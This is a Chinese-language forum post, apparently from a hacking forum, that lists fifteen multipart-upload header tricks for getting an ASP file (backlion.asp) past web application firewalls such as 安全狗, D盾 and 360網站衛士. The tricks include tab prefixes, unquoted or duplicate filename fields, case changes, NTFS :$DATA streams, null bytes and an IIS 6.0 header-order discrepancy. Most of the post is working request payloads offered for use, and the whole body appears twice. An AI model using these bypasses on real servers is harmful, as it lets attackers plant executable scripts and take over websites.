taibeihacker
Moderator
原始默認狀態:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
突破0,文件名前綴加[0x09]繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]backlion.asp”
Content-Type: text/html
突破1,文件名去掉雙引號繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=backlion.aspContent-Type: text/html
突破2,添加一個filename1的文件名參數,並賦值繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”;filename1=”test.jpg”
Content-Type: text/html
突破3, form變量改成f+orm組合繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”backlion.asp”
Content-Type: text/html
突破4 ,文件名後綴大小寫繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.Asp”
Content-Type: text/html
突破5 ,去掉form-data變量繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
突破6,在Content-Disposition:後添加多個空格或者在form-data;後添加多個空格繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data ; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
或者:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data ; name=”filepath”; filename=”baclion.asp”
Content-Type: text/html
突破7 ,backlion.asp . (空格+.)繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp .”
Content-Type: text/html
突破8 ,“回車換行,繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp
”
Content-Type: text/html
突破9 ,NTFS流在文件名後加:$DATA繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp:$DATA”
Content-Type: text/html
或者
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp:$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html
突破10, 經過對IIS 6.0的測試發現,其總是採用第一個Content-Disposition中的值做為接收參數,而安全狗總是以最後一個Content-Disposition中的值做為接收參數。因此嘗試構造如下請求[上傳backlion.asp成功]:
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
—————————–15377259221471
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.txt”
Content-Type: application/octet-stream
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”backlion.asp”
突破11,將Content-Type和ConTent-Disposition調換順序位置繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp”
突破12,在文件名前綴加空格(tab鍵可替換)繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=“backlion.asp”
Content-Type: text/html
突破13,在form-data加空格繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”uploaded”; filename=”backlion.asp”
Content-Type: text/html
突破14,在form-data的前後加上+繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
或者:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
在上述的方法中,還有些方法可以過安全狗,也可以過D盾、360網站衛士等等。另外從上述方法中,若按你們的想法,會分成那些類型?我在這裡統一劃分為特性和WAF解析不當(PS下,我不是學術派,較口語化)i,特性包括系統特性,協議特性等等,比如上述中,大多數都屬於協議的特性,因為FORM-DATA的協議十分鬆散;部分屬於系統特性,比如加空格、點號、NTFS流等等。而解析不當,比如上述的第二種添加一個filename1,這種在正常情況下無法使用的,如果第0種,對特殊字符無法解析,歸根到底也是WAF對內容解析的不當處理。以上方法可以繞過目前大部分waf了,即使防住了,結合下有時候會出現超乎想像的結果
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
突破0,文件名前綴加[0x09]繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]backlion.asp”
Content-Type: text/html
突破1,文件名去掉雙引號繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=backlion.aspContent-Type: text/html
突破2,添加一個filename1的文件名參數,並賦值繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”;filename1=”test.jpg”
Content-Type: text/html
突破3, form變量改成f+orm組合繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename=”backlion.asp”
Content-Type: text/html
突破4 ,文件名後綴大小寫繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.Asp”
Content-Type: text/html
突破5 ,去掉form-data變量繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
突破6,在Content-Disposition:後添加多個空格或者在form-data;後添加多個空格繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data ; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
或者:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data ; name=”filepath”; filename=”baclion.asp”
Content-Type: text/html
突破7 ,backlion.asp . (空格+.)繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp .”
Content-Type: text/html
突破8 ,“回車換行,繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp
”
Content-Type: text/html
突破9 ,NTFS流在文件名後加:$DATA繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp:$DATA”
Content-Type: text/html
或者
——WebKitFormBoundary2smpsxFB3D0KbA7D
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp:$DATA\0x00\fuck.asp0x00.jpg”
Content-Type: text/html
突破10, 經過對IIS 6.0的測試發現,其總是採用第一個Content-Disposition中的值做為接收參數,而安全狗總是以最後一個Content-Disposition中的值做為接收參數。因此嘗試構造如下請求[上傳backlion.asp成功]:
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
—————————–15377259221471
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.txt”
Content-Type: application/octet-stream
Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”
Content-Disposition: form-data;
name=”FileUploadName”; filename=”backlion.asp”
突破11,將Content-Type和ConTent-Disposition調換順序位置繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Type: text/html
ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp”
突破12,在文件名前綴加空格(tab鍵可替換)繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=“backlion.asp”
Content-Type: text/html
突破13,在form-data加空格繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”uploaded”; filename=”backlion.asp”
Content-Type: text/html
突破14,在form-data的前後加上+繞過:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: +form-data; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
或者:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data+; name=”filepath”; filename=”backlion.asp”
Content-Type: text/html
在上述的方法中,還有些方法可以過安全狗,也可以過D盾、360網站衛士等等。另外從上述方法中,若按你們的想法,會分成那些類型?我在這裡統一劃分為特性和WAF解析不當(PS下,我不是學術派,較口語化)i,特性包括系統特性,協議特性等等,比如上述中,大多數都屬於協議的特性,因為FORM-DATA的協議十分鬆散;部分屬於系統特性,比如加空格、點號、NTFS流等等。而解析不當,比如上述的第二種添加一個filename1,這種在正常情況下無法使用的,如果第0種,對特殊字符無法解析,歸根到底也是WAF對內容解析的不當處理。以上方法可以繞過目前大部分waf了,即使防住了,結合下有時候會出現超乎想像的結果